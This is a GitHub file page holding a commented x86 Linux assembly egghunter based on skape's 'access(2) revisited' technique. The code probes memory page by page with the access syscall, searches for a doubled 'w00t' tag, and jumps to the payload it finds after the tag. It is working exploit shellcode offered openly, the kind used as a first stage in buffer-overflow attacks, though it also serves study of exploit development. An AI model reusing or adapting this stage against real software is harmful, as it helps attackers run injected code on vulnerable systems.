Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.
Sign up
Fetching contributors…
Cannot retrieve contributors at this time
| ; Info about egghunters: | |
| ; http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf | |
| ; code based on access(2) revisited egghunter | |
| global _start | |
| section .text | |
| _start: | |
| xor edx, edx ; XOR out EDX, this will contain the target address for access and egg evaluation | |
| incr_page: | |
| ; will always reset to xFFFF and gets incremeted in the next step | |
| or dx, 0xfff ; 4095, one less than the PAGE_SIZE - | |
| ; if stating from here, increasing edx means a PAGE_SIZE increment - 0xzfff becomes 0x(z+1)000 | |
| incr_addr: | |
| inc edx ; next address | |
| lea ebx, [edx+0x4] ; load edx+4 | |
| ;http://man7.org/linux/man-pages/man2/access.2.html | |
| push byte +0x21 ; access syscall | |
| pop eax ; access syscall | |
| int 0x80 ; | |
| cmp al,0xf2 ; 0xf2 - EFAULT aka invalid memory address (outside accessible address space) | |
| jz short incr_page ; invalid memory address, we can go a PAGE_SIZE up | |
| mov eax, 0x74303077 ; w00t | |
| mov edi, edx ; | |
| scasd ; search for the first instance of EAX (w00t) in EDI | |
| jnz short incr_addr | |
| scasd ; search for the second instance EAX (w00t) in EDI | |
| jnz short incr_addr | |
| jmp edi ; execute shellcode |